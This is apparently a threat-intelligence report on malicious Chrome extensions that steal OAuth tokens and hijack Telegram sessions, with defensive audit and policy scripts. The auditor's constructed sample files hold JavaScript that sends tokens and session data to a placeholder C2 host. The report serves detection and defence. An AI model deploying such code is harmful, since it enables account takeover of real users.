Full Report
More than 100 malicious extensions in the official Chrome Web Store are attempting to steal Google OAuth2 Bearer tokens, deploy backdoors, and carry out ad fraud. [...]
Analysis Summary
# Tool/Technique: Malicious Google Chrome Extension Campaign (MaaS)
## Overview
A large-scale coordinated campaign involving over 100 malicious extensions published on the official Chrome Web Store. The extensions are designed to harvest sensitive user data, steal Google OAuth2 Bearer tokens, hijack Telegram sessions, and perform ad fraud. The operation is linked to a Russian Malware-as-a-Service (MaaS) provider utilizing centralized Command and Control (C2) infrastructure.
## Technical Details
- **Type:** Malware (Browser Extension / Infostealer / Backdoor)
- **Platform:** Cross-platform (Google Chrome Browser)
- **Capabilities:** Session hijacking, OAuth2 token theft, persistent backdoor access, ad injection, and identity harvesting.
- **First Seen:** Reported April 2026 (Socket discovery).
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
  - T1176 - Browser Extensions
- **TA0003 - Persistence**
  - T1176 - Browser Extensions
- **TA0006 - Credential Access**
  - T1539 - Steal Web Session Cookie
  - T1528 - Steal Application Access Token (OAuth2 Bearer Tokens)
- **TA0011 - Command and Control**
  - T1071.001 - Application Layer Protocol: Web Protocols
- **TA0009 - Collection**
  - T1539 - Steal Web Session Cookie (Telegram Web)
## Functionality
### Core Capabilities
- **OAuth2 Token Theft:** Uses the `chrome.identity.getAuthToken` API to siphon Google OAuth2 Bearer tokens, allowing access to the victim's Google account data without their password.
- **Identity Harvesting:** Collects personal information including email addresses, full names, profile pictures, and unique Google account IDs.
- **C2 Communication:** Communicates with subdomains hosted on a Contabo VPS for instruction fetching and data exfiltration.
### Advanced Features
- **Telegram Session Hijacking:** Monitors Telegram Web session data in `localStorage` every 15 seconds. It can overwrite a victim's local session with attacker-supplied data (`set_session_changed`), effectively swapping account access in real-time.
- **Execution Backdoor:** A hidden startup function that fetches and executes commands (such as opening arbitrary URLs) without user interaction.
- **UI Manipulation:** Injects attacker-controlled HTML via the `innerHTML` property to modify web content or facilitate phishing.
- **Ad Fraud and Proxying:** Strips security headers to inject malicious ads on YouTube and TikTok and proxies translation requests through malicious infrastructure.
## Indicators of Compromise
- **File Names:** Various extension names including "Telegram sidebar clients," "Keno games," "YouTube/TikTok enhancers," and "Text translation tools."
- **Network Indicators:**
  - `contabo[.]com` (infrastructure provider)
  - Backend C2 hosted on Contabo VPS (specific subdomains used for identity collection and session hijacking).
- **Behavioral Indicators:**
  - Frequent polling of `localStorage` for Telegram Web data.
  - Unexpected calls to `chrome.identity.getAuthToken`.
  - Modification of security headers (e.g., CSP headers) on video platforms.
## Associated Threat Actors
- **Russian-aligned MaaS (Malware-as-a-Service):** Attribution rests on code comments, found by researchers, relating to the authentication and session-theft mechanisms.
## Detection Methods
- **Behavioral Detection:** Monitoring for browser extensions that frequently access `localStorage` on cross-origin domains or make unexpected API calls to identity services.
- **Audit:** Regularly checking the `chrome://extensions/` page for unauthorized or suspicious publisher identities.
- **YARA-like scans:** Searching for the use of `innerHTML` injection patterns combined with `getAuthToken` within extension source files.
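The behavioral indicators and the "YARA-like" source scan above can be folded into one static triage pass over an unpacked extension. The script below is an added example, not code from the report or from Socket: it reads `manifest.json`, any declarativeNetRequest rule files and the extension's JavaScript, and reports the indicators this page lists (`identity` permission plus `chrome.identity.getAuthToken`, `innerHTML` assignment alongside `getAuthToken`, timer-driven `localStorage` polling, `set_session_changed`, Telegram Web host targeting, and rules that remove security headers). The sample extension files embedded in it are constructed for illustration; the regexes are deliberately loose triage heuristics, not a verdict.

```python
"""Static triage of an unpacked Chrome extension for the indicators in this report.
Added example; the SAMPLE_FILES / BENIGN_FILES contents are constructed, not real samples."""
import json
import re
from pathlib import Path

TELEGRAM_HOSTS = ("web.telegram.org",)
SECURITY_HEADERS = {"content-security-policy", "x-frame-options", "x-content-type-options"}
NETWORK_PERMS = {"declarativeNetRequest", "declarativeNetRequestWithHostAccess",
                 "webRequest", "webRequestBlocking"}

# Loose heuristics for the behaviours described in the report.
RE_GET_AUTH_TOKEN = re.compile(r"chrome\.identity\.getAuthToken")
RE_INNERHTML_ASSIGN = re.compile(r"\.innerHTML\s*=")
RE_LOCALSTORAGE_POLL = re.compile(r"setInterval\s*\([\s\S]{0,300}?localStorage")
RE_SET_SESSION = re.compile(r"set_session_changed")


def _scan_dnr_rules(path, text, findings):
    """Flag declarativeNetRequest rules that strip security headers from responses."""
    try:
        rules = json.loads(text)
    except json.JSONDecodeError:
        return
    if not isinstance(rules, list):
        return
    for rule in rules:
        action = rule.get("action", {}) if isinstance(rule, dict) else {}
        if action.get("type") != "modifyHeaders":
            continue
        for hdr in action.get("responseHeaders", []):
            name = hdr.get("header", "").lower()
            if hdr.get("operation") == "remove" and name in SECURITY_HEADERS:
                findings.add(f"{path}: removes response header '{name}'")


def audit_extension(files):
    """files maps relative path -> text content. Returns a sorted list of findings."""
    findings = set()
    manifest = json.loads(files.get("manifest.json", "{}"))
    perms = set(manifest.get("permissions", []))
    hosts = list(manifest.get("host_permissions", []))
    for cs in manifest.get("content_scripts", []):
        hosts.extend(cs.get("matches", []))
    if "identity" in perms:
        findings.add("manifest: requests 'identity' permission")
    if any(h in m for h in TELEGRAM_HOSTS for m in hosts):
        findings.add("manifest: targets Telegram Web host")
    if perms & NETWORK_PERMS:
        findings.add("manifest: can modify network requests/headers")

    saw_token, saw_innerhtml = False, False
    for path, src in files.items():
        if path == "manifest.json":
            continue
        if path.endswith(".json"):
            _scan_dnr_rules(path, src, findings)
            continue
        if not path.endswith(".js"):
            continue
        if RE_GET_AUTH_TOKEN.search(src):
            saw_token = True
            findings.add(f"{path}: calls chrome.identity.getAuthToken")
        if RE_INNERHTML_ASSIGN.search(src):
            saw_innerhtml = True
        if RE_LOCALSTORAGE_POLL.search(src):
            findings.add(f"{path}: polls localStorage on a timer")
        if RE_SET_SESSION.search(src):
            findings.add(f"{path}: references set_session_changed")
    if saw_token and saw_innerhtml:
        findings.add("extension: innerHTML injection combined with getAuthToken")
    return sorted(findings)


def audit_directory(root):
    """Load an unpacked extension from disk (e.g. a Chrome profile's Extensions folder) and audit it."""
    root = Path(root)
    files = {str(p.relative_to(root)): p.read_text(errors="replace")
             for p in root.rglob("*") if p.is_file() and p.suffix in (".json", ".js")}
    return audit_extension(files)


# Constructed sample mimicking the reported behaviours (hostnames are placeholders).
SAMPLE_FILES = {
    "manifest.json": json.dumps({
        "manifest_version": 3, "name": "Telegram Sidebar (constructed sample)",
        "permissions": ["identity", "storage", "declarativeNetRequest"],
        "host_permissions": ["https://web.telegram.org/*"],
        "declarative_net_request": {"rule_resources": [{"id": "r", "enabled": True, "path": "rules.json"}]},
        "content_scripts": [{"matches": ["https://web.telegram.org/*"], "js": ["cs.js"]}],
    }),
    "rules.json": json.dumps([{"id": 1, "priority": 1,
        "action": {"type": "modifyHeaders",
                   "responseHeaders": [{"header": "content-security-policy", "operation": "remove"}]},
        "condition": {"urlFilter": "youtube.com", "resourceTypes": ["main_frame"]}}]),
    "bg.js": 'chrome.identity.getAuthToken({interactive: false}, t => fetch("https://c2.example.invalid/t?" + t));\n'
             'document.body.innerHTML = "<div>placeholder</div>";\n',
    "cs.js": 'setInterval(function () { var s = localStorage.getItem("user_auth");\n'
             '  fetch("https://c2.example.invalid/s", {method: "POST", body: s}); }, 15000);\n'
             'function set_session_changed(d) { localStorage.setItem("user_auth", d); }\n',
}
BENIGN_FILES = {
    "manifest.json": json.dumps({"manifest_version": 3, "name": "Benign", "permissions": ["storage"]}),
    "bg.js": 'chrome.storage.local.set({installed: Date.now()});\n',
}

if __name__ == "__main__":
    for line in audit_extension(SAMPLE_FILES):
        print(line)
```

Run `audit_directory(path)` against each unpacked extension directory in a user's Chrome profile to get a per-extension finding list; any extension that combines the `identity` permission with header-stripping rules or Telegram Web polling deserves a manual look before it is allowed to stay.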
## Mitigation Strategies
- **Prevention:** Implement a "Highly Managed" extension policy using Chrome Enterprise, allowing only pre-approved extensions.
- **Hardening:** Disable the `chrome.identity` API for non-essential extensions via administrative policies.
- **User Education:** Train users to avoid third-party "Enhancer" or "Sidebar" utilities that request excessive permissions.
- **Incident Response:** If a compromise is suspected, revoke all active Google OAuth tokens and terminate all active Telegram sessions.
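The "Highly Managed" prevention and the `chrome.identity` hardening steps above both map onto Chrome's `ExtensionSettings` enterprise policy, where the `"*"` entry sets the default for every extension and per-ID entries override it. The script below is an added example, not the report's or Google's code: it builds such a policy (default `installation_mode: blocked` with `identity` and request-modifying permissions in `blocked_permissions`, plus an allowlist of approved IDs), renders it as the JSON a managed-policy file would contain, and offers a simplified check of what the policy would do to a given extension. The extension IDs are constructed placeholders (the report does not list the campaign's IDs), and the permission-merging model is a simplification of Chrome's actual evaluation.

```python
"""Generate and evaluate a Chrome ExtensionSettings policy for an allowlist-only posture.
Added example; extension IDs below are constructed placeholders, not real ones."""
import json

# Permissions this report's campaign depends on; blocked by default for every extension.
SENSITIVE_PERMISSIONS = ["identity", "webRequest", "webRequestBlocking", "declarativeNetRequest"]
INSTALLABLE_MODES = {"allowed", "force_installed", "normal_installed"}


def build_policy(approved, blocked_permissions=SENSITIVE_PERMISSIONS):
    """approved maps extension ID -> list of sensitive permissions it may keep (usually empty).
    Returns the ExtensionSettings policy value."""
    policy = {"*": {"installation_mode": "blocked",
                    "blocked_permissions": list(blocked_permissions)}}
    for ext_id, re_allowed in approved.items():
        entry = {"installation_mode": "allowed"}
        if re_allowed:
            # allowed_permissions on a per-ID entry re-enables permissions blocked by "*".
            entry["allowed_permissions"] = list(re_allowed)
        policy[ext_id] = entry
    return policy


def render_managed_policy(policy):
    """JSON for a managed policy file (on Linux: /etc/opt/chrome/policies/managed/*.json)."""
    return json.dumps({"ExtensionSettings": policy}, indent=2, sort_keys=True)


def is_install_allowed(policy, ext_id):
    entry = policy.get(ext_id, policy["*"])
    return entry.get("installation_mode", "allowed") in INSTALLABLE_MODES


def blocked_permissions_for(policy, ext_id, requested):
    """Simplified model (assumption): default blocked_permissions minus the ID's allowed_permissions.
    Returns the requested permissions the policy would withhold."""
    blocked = set(policy["*"].get("blocked_permissions", []))
    blocked -= set(policy.get(ext_id, {}).get("allowed_permissions", []))
    return sorted(p for p in requested if p in blocked)


# Constructed placeholder IDs (real IDs are 32 characters a-p).
APPROVED_ID = "a" * 32
UNKNOWN_ID = "b" * 32

if __name__ == "__main__":
    pol = build_policy({APPROVED_ID: []})
    print(render_managed_policy(pol))
    print("unknown extension installable:", is_install_allowed(pol, UNKNOWN_ID))
    print("approved extension loses:", blocked_permissions_for(pol, APPROVED_ID, ["identity", "storage"]))
```

Deploying the rendered JSON through Chrome Enterprise (or the OS-native equivalent: the Windows registry or macOS profile key for `ExtensionSettings`) blocks every extension not on the allowlist and strips `identity` and request-modifying permissions even from approved ones unless they are explicitly re-allowed per ID.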
## Related Tools/Techniques
- **ChromeLoader:** Another prominent malware family utilizing malicious extensions for monetization.
- **Cookie/Session Theft:** Similar to techniques used by infostealers like RedLine or Vidar, but specialized for the browser ecosystem.